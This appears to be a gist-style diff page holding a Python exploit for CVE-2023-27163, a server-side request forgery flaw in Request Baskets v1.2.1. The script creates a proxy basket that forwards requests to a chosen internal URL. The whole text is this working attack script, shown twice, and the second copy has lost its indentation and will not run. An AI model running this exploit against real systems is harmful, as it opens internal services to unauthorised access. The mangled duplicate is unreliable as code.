rudSarkar · August 29, 2025 14:58
diff --git a/request_baskets_v1.2.1_ssrf.py b/request_baskets_v1.2.1_ssrf.py
 #!/usr/bin/python3

 # https://nvd.nist.gov/vuln/detail/CVE-2023-27163
 # https://github.com/darklynx/request-baskets

 import argparse
 import random
 import string
 import requests

 def random_chars(length=6):
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))

 def main():
    parser = argparse.ArgumentParser(prog="Request Baskets v1.2.1 SSRF Exploit",
                                    description='python3 exploit.py -u http://10.10.12.22:55555/ -t http://127.0.0.1:80',
                                    allow_abbrev=False)
    parser.add_argument("-u", help="URL of the target, eg: http://10.10.12.22:55555/")
    parser.add_argument("-t", help="Target URL for SSRF eg: http://127.0.0.1:80")

    args = parser.parse_args()

    if not any(vars(args).values()):
        parser.print_help()
    else:
        token = ""
        basketName = random_chars()
        apiURL = f"{args.u}api/baskets/{basketName}"

        print(f"[+] Creating basket {basketName} proxy basket")

        payload = {
            "forward_url": f"{args.t}",
            "proxy_response": True,
            "insecure_tls": False,
            "expand_path": True,
            "capacity": 250
        }
        headers = {"Content-Type": "application/json"}
        sendingRequest = requests.post(apiURL, headers=headers, json=payload)
        
        if sendingRequest.status_code == 201:
            print(f"[+] Basket created '{basketName}'")

        token = sendingRequest.json()["token"]
        print(token)

        print(f"""
            Now you can access the service visiting: {args.u}{basketName}/
        """)

 if __name__ == "__main__":
    main()
	#!/usr/bin/python3

	# https://nvd.nist.gov/vuln/detail/CVE-2023-27163
	# https://github.com/darklynx/request-baskets

	import argparse
	import random
	import string
	import requests

	def random_chars(length=6):
	return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))

	def main():
	parser = argparse.ArgumentParser(prog="Request Baskets v1.2.1 SSRF Exploit",
	description='python3 exploit.py -u http://10.10.12.22:55555/ -t http://127.0.0.1:80',
	allow_abbrev=False)
	parser.add_argument("-u", help="URL of the target, eg: http://10.10.12.22:55555/")
	parser.add_argument("-t", help="Target URL for SSRF eg: http://127.0.0.1:80")

	args = parser.parse_args()

	if not any(vars(args).values()):
	parser.print_help()
	else:
	token = ""
	basketName = random_chars()
	apiURL = f"{args.u}api/baskets/{basketName}"

	print(f"[+] Creating basket {basketName} proxy basket")

	payload = {
	"forward_url": f"{args.t}",
	"proxy_response": True,
	"insecure_tls": False,
	"expand_path": True,
	"capacity": 250
	}
	headers = {"Content-Type": "application/json"}
	sendingRequest = requests.post(apiURL, headers=headers, json=payload)

	if sendingRequest.status_code == 201:
	print(f"[+] Basket created '{basketName}'")

	token = sendingRequest.json()["token"]
	print(token)

	print(f"""
	Now you can access the service visiting: {args.u}{basketName}/
	""")

	if __name__ == "__main__":
	main()